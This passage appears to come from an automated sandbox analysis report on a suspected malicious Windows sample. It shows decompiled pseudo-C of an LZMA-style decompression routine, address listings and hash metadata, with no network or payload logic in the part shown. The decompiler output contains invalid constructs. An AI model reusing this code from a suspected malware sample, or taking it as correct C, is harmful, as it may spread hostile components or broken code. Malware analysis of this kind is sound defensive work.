                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							_t484 = __ebp - 0x70;
                                                  							 *_t484 =  *(__ebp - 0x70) + 1;
                                                  							__eflags =  *_t484;
                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							L148:
                                                  							_t487 = __ebp - 0x48;
                                                  							 *_t487 =  *(__ebp - 0x48) - 1;
                                                  							__eflags =  *_t487;
                                                  							L149:
                                                  							__eflags =  *(__ebp - 0x48);
                                                  							if( *(__ebp - 0x48) <= 0) {
                                                  								__ecx =  *(__ebp - 0x40);
                                                  								__ebx =  *(__ebp - 0x50);
                                                  								0 = 1;
                                                  								__eax = 1 << __cl;
                                                  								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                  								__eax =  *(__ebp - 0x7c);
                                                  								 *(__ebp - 0x44) = __ebx;
                                                  								goto L140;
                                                  							}
                                                  							__eax =  *(__ebp - 0x50);
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                  							__eax =  *(__ebp - 0x58);
                                                  							__esi = __edx + __eax;
                                                  							 *(__ebp - 0x54) = __esi;
                                                  							__ax =  *__esi;
                                                  							__edi = __ax & 0x0000ffff;
                                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  							__eflags =  *(__ebp - 0xc) - __ecx;
                                                  							if( *(__ebp - 0xc) >= __ecx) {
                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  								__cx = __ax;
                                                  								__cx = __ax >> 5;
                                                  								__eax = __eax - __ecx;
                                                  								__edx = __edx + 1;
                                                  								__eflags = __edx;
                                                  								 *__esi = __ax;
                                                  								 *(__ebp - 0x50) = __edx;
                                                  							} else {
                                                  								 *(__ebp - 0x10) = __ecx;
                                                  								0x800 = 0x800 - __edi;
                                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                  								 *__esi = __cx;
                                                  							}
                                                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                                  								goto L148;
                                                  							} else {
                                                  								goto L146;
                                                  							}
                                                  						case 0x19:
                                                  							__eflags = __ebx - 4;
                                                  							if(__ebx < 4) {
                                                  								 *(__ebp - 0x2c) = __ebx;
                                                  								L119:
                                                  								_t393 = __ebp - 0x2c;
                                                  								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                  								__eflags =  *_t393;
                                                  								L120:
                                                  								__eax =  *(__ebp - 0x2c);
                                                  								__eflags = __eax;
                                                  								if(__eax == 0) {
                                                  									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                  									goto L170;
                                                  								}
                                                  								__eflags = __eax -  *(__ebp - 0x60);
                                                  								if(__eax >  *(__ebp - 0x60)) {
                                                  									goto L171;
                                                  								}
                                                  								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                  								__eax =  *(__ebp - 0x30);
                                                  								_t400 = __ebp - 0x60;
                                                  								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                  								__eflags =  *_t400;
                                                  								goto L123;
                                                  							}
                                                  							__ecx = __ebx;
                                                  							__eax = __ebx;
                                                  							__ecx = __ebx >> 1;
                                                  							__eax = __ebx & 0x00000001;
                                                  							__ecx = (__ebx >> 1) - 1;
                                                  							__al = __al | 0x00000002;
                                                  							__eax = (__ebx & 0x00000001) << __cl;
                                                  							__eflags = __ebx - 0xe;
                                                  							 *(__ebp - 0x2c) = __eax;
                                                  							if(__ebx >= 0xe) {
                                                  								__ebx = 0;
                                                  								 *(__ebp - 0x48) = __ecx;
                                                  								L102:
                                                  								__eflags =  *(__ebp - 0x48);
                                                  								if( *(__ebp - 0x48) <= 0) {
                                                  									__eax = __eax + __ebx;
                                                  									 *(__ebp - 0x40) = 4;
                                                  									 *(__ebp - 0x2c) = __eax;
                                                  									__eax =  *(__ebp - 4);
                                                  									__eax =  *(__ebp - 4) + 0x644;
                                                  									__eflags = __eax;
                                                  									L108:
                                                  									__ebx = 0;
                                                  									 *(__ebp - 0x58) = __eax;
                                                  									 *(__ebp - 0x50) = 1;
                                                  									 *(__ebp - 0x44) = 0;
                                                  									 *(__ebp - 0x48) = 0;
                                                  									L112:
                                                  									__eax =  *(__ebp - 0x40);
                                                  									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                  									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                  										_t391 = __ebp - 0x2c;
                                                  										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                  										__eflags =  *_t391;
                                                  										goto L119;
                                                  									}
                                                  									__eax =  *(__ebp - 0x50);
                                                  									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                  									__eax =  *(__ebp - 0x58);
                                                  									__esi = __edi + __eax;
                                                  									 *(__ebp - 0x54) = __esi;
                                                  									__ax =  *__esi;
                                                  									__ecx = __ax & 0x0000ffff;
                                                  									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                  									__eflags =  *(__ebp - 0xc) - __edx;
                                                  									if( *(__ebp - 0xc) >= __edx) {
                                                  										__ecx = 0;
                                                  										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                  										__ecx = 1;
                                                  										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                  										__ebx = 1;
                                                  										__ecx =  *(__ebp - 0x48);
                                                  										__ebx = 1 << __cl;
                                                  										__ecx = 1 << __cl;
                                                  										__ebx =  *(__ebp - 0x44);
                                                  										__ebx =  *(__ebp - 0x44) | __ecx;
                                                  										__cx = __ax;
                                                  										__cx = __ax >> 5;
                                                  										__eax = __eax - __ecx;
                                                  										__edi = __edi + 1;
                                                  										__eflags = __edi;
                                                  										 *(__ebp - 0x44) = __ebx;
                                                  										 *__esi = __ax;
                                                  										 *(__ebp - 0x50) = __edi;
                                                  									} else {
                                                  										 *(__ebp - 0x10) = __edx;
                                                  										0x800 = 0x800 - __ecx;
                                                  										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                  										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                  										 *__esi = __dx;
                                                  									}
                                                  									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  									if( *(__ebp - 0x10) >= 0x1000000) {
                                                  										L111:
                                                  										_t368 = __ebp - 0x48;
                                                  										 *_t368 =  *(__ebp - 0x48) + 1;
                                                  										__eflags =  *_t368;
                                                  										goto L112;
                                                  									} else {
                                                  										goto L109;
                                                  									}
                                                  								}
                                                  								__ecx =  *(__ebp - 0xc);
                                                  								__ebx = __ebx + __ebx;
                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                  								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                  								 *(__ebp - 0x44) = __ebx;
                                                  								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                  									__ecx =  *(__ebp - 0x10);
                                                  									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                  									__ebx = __ebx | 0x00000001;
                                                  									__eflags = __ebx;
                                                  									 *(__ebp - 0x44) = __ebx;
                                                  								}
                                                  								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  								if( *(__ebp - 0x10) >= 0x1000000) {
                                                  									L101:
                                                  									_t338 = __ebp - 0x48;
                                                  									 *_t338 =  *(__ebp - 0x48) - 1;
                                                  									__eflags =  *_t338;
                                                  									goto L102;
                                                  								} else {
                                                  									goto L99;
                                                  								}
                                                  							}
                                                  							__edx =  *(__ebp - 4);
                                                  							__eax = __eax - __ebx;
                                                  							 *(__ebp - 0x40) = __ecx;
                                                  							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                  							goto L108;
                                                  						case 0x1a:
                                                  							L56:
                                                  							__eflags =  *(__ebp - 0x64);
                                                  							if( *(__ebp - 0x64) == 0) {
                                                  								 *(__ebp - 0x88) = 0x1a;
                                                  								goto L170;
                                                  							}
                                                  							__ecx =  *(__ebp - 0x68);
                                                  							__al =  *(__ebp - 0x5c);
                                                  							__edx =  *(__ebp - 8);
                                                  							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                  							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                  							 *( *(__ebp - 0x68)) = __al;
                                                  							__ecx =  *(__ebp - 0x14);
                                                  							 *(__ecx +  *(__ebp - 8)) = __al;
                                                  							__eax = __ecx + 1;
                                                  							__edx = 0;
                                                  							_t192 = __eax %  *(__ebp - 0x74);
                                                  							__eax = __eax /  *(__ebp - 0x74);
                                                  							__edx = _t192;
                                                  							goto L79;
                                                  						case 0x1b:
                                                  							goto L75;
                                                  						case 0x1c:
                                                  							while(1) {
                                                  								L123:
                                                  								__eflags =  *(__ebp - 0x64);
                                                  								if( *(__ebp - 0x64) == 0) {
                                                  									break;
                                                  								}
                                                  								__eax =  *(__ebp - 0x14);
                                                  								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  								__eflags = __eax -  *(__ebp - 0x74);
                                                  								if(__eax >=  *(__ebp - 0x74)) {
                                                  									__eax = __eax +  *(__ebp - 0x74);
                                                  									__eflags = __eax;
                                                  								}
                                                  								__edx =  *(__ebp - 8);
                                                  								__cl =  *(__eax + __edx);
                                                  								__eax =  *(__ebp - 0x14);
                                                  								 *(__ebp - 0x5c) = __cl;
                                                  								 *(__eax + __edx) = __cl;
                                                  								__eax = __eax + 1;
                                                  								__edx = 0;
                                                  								_t414 = __eax %  *(__ebp - 0x74);
                                                  								__eax = __eax /  *(__ebp - 0x74);
                                                  								__edx = _t414;
                                                  								__eax =  *(__ebp - 0x68);
                                                  								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                  								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                  								__eflags =  *(__ebp - 0x30);
                                                  								 *( *(__ebp - 0x68)) = __cl;
                                                  								 *(__ebp - 0x14) = _t414;
                                                  								if( *(__ebp - 0x30) > 0) {
                                                  									continue;
                                                  								} else {
                                                  									goto L80;
                                                  								}
                                                  							}
                                                  							 *(__ebp - 0x88) = 0x1c;
                                                  							goto L170;
                                                  					}
                                                  				}
                                                  			}













                                                  0x004063e0
                                                  0x004063e3
                                                  0x004063e9
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063ee
                                                  0x004063f1
                                                  0x004063f1
                                                  0x004063f4
                                                  0x004063f7
                                                  0x00000000
                                                  0x00000000
                                                  0x004063fd
                                                  0x00406403
                                                  0x00000000
                                                  0x00000000
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640d
                                                  0x00406410
                                                  0x00406413
                                                  0x00406416
                                                  0x00406419
                                                  0x0040641a
                                                  0x0040641d
                                                  0x0040641f
                                                  0x00406425
                                                  0x00406428
                                                  0x0040642b
                                                  0x0040642e
                                                  0x00406431
                                                  0x00406434
                                                  0x00406437
                                                  0x00406453
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645c
                                                  0x00406463
                                                  0x00406467
                                                  0x00406469
                                                  0x0040646d
                                                  0x00406439
                                                  0x00406439
                                                  0x0040643d
                                                  0x00406445
                                                  0x0040644a
                                                  0x0040644c
                                                  0x0040644e
                                                  0x0040644e
                                                  0x00406470
                                                  0x00406477
                                                  0x0040647a
                                                  0x00000000
                                                  0x00406480
                                                  0x00000000
                                                  0x00406480
                                                  0x00000000
                                                  0x00406485
                                                  0x00406485
                                                  0x00406489
                                                  0x00406b49
                                                  0x00000000
                                                  0x00406b49
                                                  0x0040648f
                                                  0x00406492
                                                  0x00406495
                                                  0x00406499
                                                  0x0040649c
                                                  0x004064a2
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a7
                                                  0x004064aa
                                                  0x004064aa
                                                  0x004064aa
                                                  0x004064b0
                                                  0x00000000
                                                  0x00000000
                                                  0x004064b2
                                                  0x004064b5
                                                  0x004064b8
                                                  0x004064bb
                                                  0x004064be
                                                  0x004064c1
                                                  0x004064c4
                                                  0x004064c7
                                                  0x004064ca
                                                  0x004064cd
                                                  0x004064d0
                                                  0x004064e8
                                                  0x004064eb
                                                  0x004064ee
                                                  0x004064f1
                                                  0x004064f1
                                                  0x004064f4
                                                  0x004064f8
                                                  0x004064fa
                                                  0x004064d2
                                                  0x004064d2
                                                  0x004064da
                                                  0x004064df
                                                  0x004064e1
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064fd
                                                  0x00406504
                                                  0x00406507
                                                  0x00000000
                                                  0x00406509
                                                  0x00000000
                                                  0x00406509
                                                  0x00406507
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406549
                                                  0x00406549
                                                  0x0040654d
                                                  0x00406b55
                                                  0x00000000
                                                  0x00406b55
                                                  0x00406553
                                                  0x00406556
                                                  0x00406559
                                                  0x0040655d
                                                  0x00406560
                                                  0x00406566
                                                  0x00406568
                                                  0x00406568
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406574
                                                  0x00406512
                                                  0x00406512
                                                  0x00406515
                                                  0x00000000
                                                  0x00406515
                                                  0x00406576
                                                  0x00406576
                                                  0x00406579
                                                  0x0040657c
                                                  0x0040657f
                                                  0x00406582
                                                  0x00406585
                                                  0x00406588
                                                  0x0040658b
                                                  0x0040658e
                                                  0x00406591
                                                  0x00406594
                                                  0x004065ac
                                                  0x004065af
                                                  0x004065b2
                                                  0x004065b5
                                                  0x004065b5
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065be
                                                  0x00406596
                                                  0x00406596
                                                  0x0040659e
                                                  0x004065a3
                                                  0x004065a5
                                                  0x004065a7
                                                  0x004065a7
                                                  0x004065c1
                                                  0x004065c8
                                                  0x004065cb
                                                  0x00000000
                                                  0x004065cd
                                                  0x00000000
                                                  0x004065cd
                                                  0x00000000
                                                  0x0040685a
                                                  0x0040685a
                                                  0x0040685e
                                                  0x00406b85
                                                  0x00000000
                                                  0x00406b85
                                                  0x00406864
                                                  0x00406867
                                                  0x0040686a
                                                  0x0040686e
                                                  0x00406871
                                                  0x00406877
                                                  0x00406879
                                                  0x00406879
                                                  0x00406879
                                                  0x0040687c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406969
                                                  0x0040696d
                                                  0x0040698f
                                                  0x00406992
                                                  0x0040699c
                                                  0x00000000
                                                  0x0040699c
                                                  0x0040696f
                                                  0x00406972
                                                  0x00406976
                                                  0x00406979
                                                  0x00406979
                                                  0x0040697c
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406a2a
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a4f
                                                  0x00406a56
                                                  0x00406a5d
                                                  0x00406a5d
                                                  0x00000000
                                                  0x00406a5d
                                                  0x00406a2c
                                                  0x00406a2f
                                                  0x00406a32
                                                  0x00406a35
                                                  0x00406a3c
                                                  0x00406980
                                                  0x00406980
                                                  0x00406983
                                                  0x00000000
                                                  0x00000000
                                                  0x00406b17
                                                  0x00406b1a
                                                  0x00000000
                                                  0x00000000
                                                  0x00406751
                                                  0x00406753
                                                  0x0040675a
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00000000
                                                  0x00000000
                                                  0x00406768
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406772
                                                  0x00406772
                                                  0x00406773
                                                  0x00406776
                                                  0x0040677d
                                                  0x00406780
                                                  0x0040678e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a64
                                                  0x00406a64
                                                  0x00406a67
                                                  0x00406a6e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a73
                                                  0x00406a73
                                                  0x00406a77
                                                  0x00406baf
                                                  0x00000000
                                                  0x00406baf
                                                  0x00406a7d
                                                  0x00406a80
                                                  0x00406a83
                                                  0x00406a87
                                                  0x00406a8a
                                                  0x00406a90
                                                  0x00406a92
                                                  0x00406a92
                                                  0x00406a92
                                                  0x00406a95
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a9b
                                                  0x00406a9b
                                                  0x00406a9f
                                                  0x00406aff
                                                  0x00406b02
                                                  0x00406b07
                                                  0x00406b08
                                                  0x00406b0a
                                                  0x00406b0c
                                                  0x00406b0f
                                                  0x00000000
                                                  0x00406b0f
                                                  0x00406aa1
                                                  0x00406aa7
                                                  0x00406aaa
                                                  0x00406aad
                                                  0x00406ab0
                                                  0x00406ab3
                                                  0x00406ab6
                                                  0x00406ab9
                                                  0x00406abc
                                                  0x00406abf
                                                  0x00406ac2
                                                  0x00406adb
                                                  0x00406ade
                                                  0x00406ae1
                                                  0x00406ae4
                                                  0x00406ae8
                                                  0x00406aea
                                                  0x00406aea
                                                  0x00406aeb
                                                  0x00406aee
                                                  0x00406ac4
                                                  0x00406ac4
                                                  0x00406acc
                                                  0x00406ad1
                                                  0x00406ad3
                                                  0x00406ad6
                                                  0x00406ad6
                                                  0x00406af1
                                                  0x00406af8
                                                  0x00000000
                                                  0x00406afa
                                                  0x00000000
                                                  0x00406afa
                                                  0x00000000
                                                  0x00406796
                                                  0x00406799
                                                  0x004067cf
                                                  0x004068ff
                                                  0x004068ff
                                                  0x004068ff
                                                  0x004068ff
                                                  0x00406902
                                                  0x00406902
                                                  0x00406905
                                                  0x00406907
                                                  0x00406b91
                                                  0x00000000
                                                  0x00406b91
                                                  0x0040690d
                                                  0x00406910
                                                  0x00000000
                                                  0x00000000
                                                  0x00406916
                                                  0x0040691a
                                                  0x0040691d
                                                  0x0040691d
                                                  0x0040691d
                                                  0x00000000
                                                  0x0040691d
                                                  0x0040679b
                                                  0x0040679d
                                                  0x0040679f
                                                  0x004067a1
                                                  0x004067a4
                                                  0x004067a5
                                                  0x004067a7
                                                  0x004067a9
                                                  0x004067ac
                                                  0x004067af
                                                  0x004067c5
                                                  0x004067ca
                                                  0x00406802
                                                  0x00406802
                                                  0x00406806
                                                  0x00406832
                                                  0x00406834
                                                  0x0040683b
                                                  0x0040683e
                                                  0x00406841
                                                  0x00406841
                                                  0x00406846
                                                  0x00406846
                                                  0x00406848
                                                  0x0040684b
                                                  0x00406852
                                                  0x00406855
                                                  0x00406882
                                                  0x00406882
                                                  0x00406885
                                                  0x00406888
                                                  0x004068fc
                                                  0x004068fc
                                                  0x004068fc
                                                  0x00000000
                                                  0x004068fc
                                                  0x0040688a
                                                  0x00406890
                                                  0x00406893
                                                  0x00406896
                                                  0x00406899
                                                  0x0040689c
                                                  0x0040689f
                                                  0x004068a2
                                                  0x004068a5
                                                  0x004068a8
                                                  0x004068ab
                                                  0x004068c4
                                                  0x004068c6
                                                  0x004068c9
                                                  0x004068ca
                                                  0x004068cd
                                                  0x004068cf
                                                  0x004068d2
                                                  0x004068d4
                                                  0x004068d6
                                                  0x004068d9
                                                  0x004068db
                                                  0x004068de
                                                  0x004068e2
                                                  0x004068e4
                                                  0x004068e4
                                                  0x004068e5
                                                  0x004068e8
                                                  0x004068eb
                                                  0x004068ad
                                                  0x004068ad
                                                  0x004068b5
                                                  0x004068ba
                                                  0x004068bc
                                                  0x004068bf
                                                  0x004068bf
                                                  0x004068ee
                                                  0x004068f5
                                                  0x0040687f
                                                  0x0040687f
                                                  0x0040687f
                                                  0x0040687f
                                                  0x00000000
                                                  0x004068f7
                                                  0x00000000
                                                  0x004068f7
                                                  0x004068f5
                                                  0x00406808
                                                  0x0040680b
                                                  0x0040680d
                                                  0x00406810
                                                  0x00406813
                                                  0x00406816
                                                  0x00406818
                                                  0x0040681b
                                                  0x0040681e
                                                  0x0040681e
                                                  0x00406821
                                                  0x00406821
                                                  0x00406824
                                                  0x0040682b
                                                  0x004067ff
                                                  0x004067ff
                                                  0x004067ff
                                                  0x004067ff
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 112a48c21f92b6a8e33e5cbf0d578aa67701f3a308a0143f1b2e2e22e9c0a048
                                                  • Instruction ID: 56628f401a4fc6d73e137493fcd66a1037cbd66c5efac646bb7951d26cabb475
                                                  • Opcode Fuzzy Hash: 112a48c21f92b6a8e33e5cbf0d578aa67701f3a308a0143f1b2e2e22e9c0a048
                                                  • Instruction Fuzzy Hash: CF815871D00228CFDF24CFA8C8447ADBBB1FB45305F25816AD856BB281D7789A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 98%
                                                  			E00406184(void* __ecx) {
                                                  				void* _v8;
                                                  				void* _v12;
                                                  				signed int _v16;
                                                  				unsigned int _v20;
                                                  				signed int _v24;
                                                  				signed int _v28;
                                                  				signed int _v32;
                                                  				signed int _v36;
                                                  				signed int _v40;
                                                  				signed int _v44;
                                                  				signed int _v48;
                                                  				signed int _v52;
                                                  				signed int _v56;
                                                  				signed int _v60;
                                                  				signed int _v64;
                                                  				signed int _v68;
                                                  				signed int _v72;
                                                  				signed int _v76;
                                                  				signed int _v80;
                                                  				signed int _v84;
                                                  				signed int _v88;
                                                  				signed int _v92;
                                                  				signed int _v95;
                                                  				signed int _v96;
                                                  				signed int _v100;
                                                  				signed int _v104;
                                                  				signed int _v108;
                                                  				signed int _v112;
                                                  				signed int _v116;
                                                  				signed int _v120;
                                                  				intOrPtr _v124;
                                                  				signed int _v128;
                                                  				signed int _v132;
                                                  				signed int _v136;
                                                  				void _v140;
                                                  				void* _v148;
                                                  				signed int _t537;
                                                  				signed int _t538;
                                                  				signed int _t572;
                                                  
                                                  				_t572 = 0x22;
                                                  				_v148 = __ecx;
                                                  				memcpy( &_v140, __ecx, _t572 << 2);
                                                  				if(_v52 == 0xffffffff) {
                                                  					return 1;
                                                  				}
                                                  				while(1) {
                                                  					L3:
                                                  					_t537 = _v140;
                                                  					if(_t537 > 0x1c) {
                                                  						break;
                                                  					}
                                                  					switch( *((intOrPtr*)(_t537 * 4 +  &M00406BD6))) {
                                                  						case 0:
                                                  							__eflags = _v112;
                                                  							if(_v112 == 0) {
                                                  								goto L173;
                                                  							}
                                                  							_v112 = _v112 - 1;
                                                  							_v116 = _v116 + 1;
                                                  							_t537 =  *_v116;
                                                  							__eflags = _t537 - 0xe1;
                                                  							if(_t537 > 0xe1) {
                                                  								goto L174;
                                                  							}
                                                  							_t542 = _t537 & 0x000000ff;
                                                  							_push(0x2d);
                                                  							asm("cdq");
                                                  							_pop(_t576);
                                                  							_push(9);
                                                  							_pop(_t577);
                                                  							_t622 = _t542 / _t576;
                                                  							_t544 = _t542 % _t576 & 0x000000ff;
                                                  							asm("cdq");
                                                  							_t617 = _t544 % _t577 & 0x000000ff;
                                                  							_v64 = _t617;
                                                  							_v32 = (1 << _t622) - 1;
                                                  							_v28 = (1 << _t544 / _t577) - 1;
                                                  							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                  							__eflags = 0x600 - _v124;
                                                  							if(0x600 == _v124) {
                                                  								L12:
                                                  								__eflags = _t625;
                                                  								if(_t625 == 0) {
                                                  									L14:
                                                  									_v76 = _v76 & 0x00000000;
                                                  									_v68 = _v68 & 0x00000000;
                                                  									goto L17;
                                                  								} else {
                                                  									goto L13;
                                                  								}
                                                  								do {
                                                  									L13:
                                                  									_t625 = _t625 - 1;
                                                  									__eflags = _t625;
                                                  									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                  								} while (_t625 != 0);
                                                  								goto L14;
                                                  							}
                                                  							__eflags = _v8;
                                                  							if(_v8 != 0) {
                                                  								GlobalFree(_v8);
                                                  							}
                                                  							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                  							__eflags = _t537;
                                                  							_v8 = _t537;
                                                  							if(_t537 == 0) {
                                                  								goto L174;
                                                  							} else {
                                                  								_v124 = 0x600;
                                                  								goto L12;
                                                  							}
                                                  						case 1:
                                                  							L15:
                                                  							__eflags = _v112;
                                                  							if(_v112 == 0) {
                                                  								_v140 = 1;
                                                  								goto L173;
                                                  							}
                                                  							_v112 = _v112 - 1;
                                                  							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                  							_v116 = _v116 + 1;
                                                  							_t50 =  &_v76;
                                                  							 *_t50 = _v76 + 1;
                                                  							__eflags =  *_t50;
                                                  							L17:
                                                  							__eflags = _v76 - 4;
                                                  							if(_v76 < 4) {
                                                  								goto L15;
                                                  							}
                                                  							_t550 = _v68;
                                                  							__eflags = _t550 - _v120;
                                                  							if(_t550 == _v120) {
                                                  								L22:
                                                  								_v76 = 5;
                                                  								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                  								goto L25;
                                                  							}
                                                  							__eflags = _v12;
                                                  							_v120 = _t550;
                                                  							if(_v12 != 0) {
                                                  								GlobalFree(_v12);
                                                  							}
                                                  							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                  							__eflags = _t537;
                                                  							_v12 = _t537;
                                                  							if(_t537 == 0) {
                                                  								goto L174;
                                                  							} else {
                                                  								goto L22;
                                                  							}
                                                  						case 2:
                                                  							L26:
                                                  							_t557 = _v100 & _v32;
                                                  							_v136 = 6;
                                                  							_v80 = _t557;
                                                  							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                  							goto L135;
                                                  						case 3:
                                                  							L23:
                                                  							__eflags = _v112;
                                                  							if(_v112 == 0) {
                                                  								_v140 = 3;
                                                  								goto L173;
                                                  							}
                                                  							_v112 = _v112 - 1;
                                                  							_t72 =  &_v116;
                                                  							 *_t72 = _v116 + 1;
                                                  							__eflags =  *_t72;
                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							L25:
                                                  							_v76 = _v76 - 1;
                                                  							__eflags = _v76;
                                                  							if(_v76 != 0) {
                                                  								goto L23;
                                                  							}
                                                  							goto L26;
                                                  						case 4:
                                                  							L136:
                                                  							_t559 =  *_t626;
                                                  							_t610 = _t559 & 0x0000ffff;
                                                  							_t591 = (_v20 >> 0xb) * _t610;
                                                  							__eflags = _v16 - _t591;
                                                  							if(_v16 >= _t591) {
                                                  								_v20 = _v20 - _t591;
                                                  								_v16 = _v16 - _t591;
                                                  								_v68 = 1;
                                                  								_t560 = _t559 - (_t559 >> 5);
                                                  								__eflags = _t560;
                                                  								 *_t626 = _t560;
                                                  							} else {
                                                  								_v20 = _t591;
                                                  								_v68 = _v68 & 0x00000000;
                                                  								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                  							}
                                                  							__eflags = _v20 - 0x1000000;
                                                  							if(_v20 >= 0x1000000) {
                                                  								goto L142;
                                                  							} else {
                                                  								goto L140;
                                                  							}
                                                  						case 5:
                                                  							L140:
                                                  							__eflags = _v112;
                                                  							if(_v112 == 0) {
                                                  								_v140 = 5;
                                                  								goto L173;
                                                  							}
                                                  							_v20 = _v20 << 8;
                                                  							_v112 = _v112 - 1;
                                                  							_t464 =  &_v116;
                                                  							 *_t464 = _v116 + 1;
                                                  							__eflags =  *_t464;
                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							L142:
                                                  							_t561 = _v136;
                                                  							goto L143;
                                                  						case 6:
                                                  							__edx = 0;
                                                  							__eflags = _v68;
                                                  							if(_v68 != 0) {
                                                  								__eax = _v8;
                                                  								__ecx = _v60;
                                                  								_v56 = 1;
                                                  								_v136 = 7;
                                                  								__esi = _v8 + 0x180 + _v60 * 2;
                                                  								goto L135;
                                                  							}
                                                  							__eax = _v96 & 0x000000ff;
                                                  							__esi = _v100;
                                                  							__cl = 8;
                                                  							__cl = 8 - _v64;
                                                  							__esi = _v100 & _v28;
                                                  							__eax = (_v96 & 0x000000ff) >> 8;
                                                  							__ecx = _v64;
                                                  							__esi = (_v100 & _v28) << 8;
                                                  							__ecx = _v8;
